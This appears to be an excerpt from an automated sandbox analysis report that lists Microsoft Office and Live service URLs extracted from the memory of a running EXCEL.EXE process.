Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apis.live.net/v5.0/?
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft3
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://apis.mobile.m365.svc.cloud.microsoft3Q
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4129801472.00000121DADBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://app.powerbi.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com/v4/api/selectionN
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/0C
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/0c
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop-dogfood.officeppe.com
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop-dogfood.officeppe.comP
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop-gcc.office.com;https://augloop.gov.online.office365.us;https://augloop.dod.online.of
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://augloop-int.officeppe.com
Source: EXCEL.EXE, 00000000.00000002.4109450255.00000121C81BD000.00000004.00000020.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com/v23
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com;https://augloop-int
Source: EXCEL.EXE, 00000000.00000002.4114839263.00000121DA132000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://augloop.office.comA
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133722863.00000121DF038000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover-s.outlook.com/
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com.br/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com.br/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com.cn/Autodiscover/Autodiscover.xmlWB
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com.cn/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.com/autodiscover/autodiscover.xmlwD
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.es/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.es/autodiscover/autodiscover.xmlgB
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.fr/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.fr/autodiscover/autodiscover.xmloB
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.in/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.in/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.it/Autodiscover/Autodiscover.xmlGD
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.it/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.online/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.online/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.sg/Autodiscover/Autodiscover.xml/D
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.sg/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.uk/Autodiscover/Autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.uk/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.xyz/Autodiscover/Autodiscover.xmlgG
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://autodiscover.xyz/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://broadcast.officeapps.live.com/m/broadcasthost.asmxinf
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.designerapp.osi.office.net0
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4133918299.00000121DF22C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.entity.osi.office.net/OfficeEntity/web/views/juno.desktop.cshtmltmlj
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/0t
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/3
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.hubblecontent.osi.office.net/3.
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://client-office365-tas.msedge.net/abice
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/%s/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/L
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4130078724.00000121DB04D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies??
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA957000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkeyp
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx1
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx3S
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF100000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com/
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com/https://odc.officeapps.live.com/odc/stat/images/sm/partner/iMa
Source: EXCEL.EXE, 00000000.00000002.4130045888.00000121DAE1C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cloudimanage.com/m365/oauth2/callback
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://config.edge.skype.com/config/v2/Office0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://contentstorage.osi.office.net/%s/%s3p
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.aik
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cortana.ail
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cr.office.com
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.net
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://d.docs.live.netK
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileFilecyTi
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.o365filtering.com~
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFiler
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciests
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.net
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerapp.azurewebsites.netV
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DADBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://designerappservice.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.cortana.aip
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/int
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://directory.services.
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://directory.services.live.com/profile/Profile.asmx.asmx
Source: EXCEL.EXE, 00000000.00000002.4110954710.00000121CA3FA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://docs.live.net/skydocsservice.svc3B
Source: EXCEL.EXE, 00000000.00000002.4129188869.00000121DAC58000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v1/Designer0
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmp, EXCEL.EXE, 00000000.00000002.4114391032.00000121D7F32000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/excel/16.0.18129.20158/Production/CC?&EcsCanary=1&Clientid=
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com/config/v2/Office/excel/16.0.18129.20158/Production/CC?&EcsCanary=1&Clientid=%
Source: EXCEL.EXE, 00000000.00000002.4114282058.00000121D7D9D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ecs.office.com:443/config/v2/Office/excel/16.0.18129.20158/Production/CC?&EcsCanary=1&Client
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Refresh/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Resolve/v1VGl
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/Search/v1p
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/OfficeEnrichment/ipcheck/v1?
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/j
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://enrichment.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comces/
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnostics.office.comces//
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://entity.osi.office.net/t
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excelcs.officeapps.live.com/xlauto/excelautomation.svc/XlAutomation
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excelsgs.officeapps.live.com/xlfrontdoor/FrontDoor.ashx
Source: EXCEL.EXE, 00000000.00000002.4133918299.00000121DF36A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://explore.live.com/homehttps://odc.officeapps.live.com/odc/stat/images/sm/liveconnect_16_1.png
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPage.aspx
Source: EXCEL.EXE, 00000000.00000002.4126635984.00000121DA8DE000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPageV2.aspx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/Pages/DesignPageV2.aspx?lang=
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://forms.office.com/formapi/api/
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoft
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://fs.microsoftw
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.ppe.windows.net/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/&
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/b
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.net/me?api-version=1.6-
Source: EXCEL.EXE, 00000000.00000002.4126710500.00000121DA908000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://graph.windows.netL
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/log
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.com/mediasvc/api/media/oembed
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comationusel
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubble.officeapps.live.comlients/inapp
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: EXCEL.EXE, 00000000.00000002.4110404206.00000121CA3E6000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetrystOfficeOnlineContenthttps://insertmedi
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=iconsOffice
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimagesEx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: EXCEL.EXE, 00000000.00000002.4129801472.00000121DAD6B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/videopickerker
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://identity.osi.office.net/v1/tokenken0
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.com0m
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comfile
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comom02
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnostics.office.comrs3
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: EXCEL.EXE, 00000000.00000002.4126222059.00000121DA861000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://incidents.diagnosticssdf.office.comClo;
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clienti
Source: EXCEL.EXE, 00000000.00000002.4116582370.00000121DA32A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://inclient.store.office.com/gyro/clientl
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOffice:
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArtOfficeEx
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebookfficetes
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FacebookfficetesJ
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: EXCEL.EXE, 00000000.00000002.4126494287.00000121DA886000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickrersi
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveages
Source: EXCEL.EXE, 00000000.00000002.4129714461.00000121DAD41000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrivemObjects
